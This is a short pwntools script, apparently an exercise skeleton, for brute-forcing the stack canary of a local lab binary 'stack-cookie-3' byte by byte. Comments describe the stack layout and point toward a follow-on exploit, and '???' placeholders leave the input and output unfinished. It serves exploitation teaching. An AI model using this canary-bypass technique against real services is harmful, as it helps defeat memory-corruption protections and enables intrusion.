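#!/usr/bin/env python
from pwn import *

# Module-level tube to the target, opened at import time and shared by the
# `checking()` calls below.
p = process('./stack-cookie-3')


def checking(p: process, buf: bytes) -> bytes:
    """Recover the next byte of the stack cookie by observation.

    For each candidate value 0..255 the function sends ``buf`` (the cookie
    bytes recovered so far) followed by the candidate, then checks whether
    the target reports ``stack smashing detected``. The first candidate that
    does *not* trigger that report is returned.

    Args:
        p: pwntools tube connected to the target. The same tube is reused for
           every candidate, so it must remain usable after a failed guess —
           confirm this against the target's behaviour.
        buf: cookie bytes already recovered (empty on the first call).

    Returns:
        The single recovered byte, as ``bytes`` of length 1.

    Raises:
        RuntimeError: if every candidate triggered the detection message
            (subclass of ``Exception``, so existing handlers still match).
    """
    # Synchronise with the target before the first attempt; the data read
    # here is not needed.
    # NOTE(review): pwntools sends/receives bytes under Python 3 — prefer
    # b"..." literals once the "???" placeholders are filled in.
    p.recvuntil("???")
    for guess in range(256):
        # Send the length of the data that we will send.
        # We will guess 1 more byte than 0x80 + cookie,
        # because our buffer starts at -0x8c(%ebp),
        # and the cookie is at -0xc(%ebp)
        # [ BUFFER (0x80) ] [Cookie] [XXXX] [YYYY] [Saved ebp] [RET] ...
        p.sendline("???")
        # Wait for the target to ask for the data itself.
        p.recvuntil("???")
        # Send the current guess: the known prefix plus one candidate byte.
        p.sendline(buf + bytes([guess]))
        o = p.recvuntil("???")
        # A candidate that does not trip the detector is the right byte.
        if b'stack smashing detected' not in o:
            return bytes([guess])
    raise RuntimeError("Failed to find a match")


# please run `checking()` to get all four/eight bytes of the cookie...
# please use the cookie to launch your exploit!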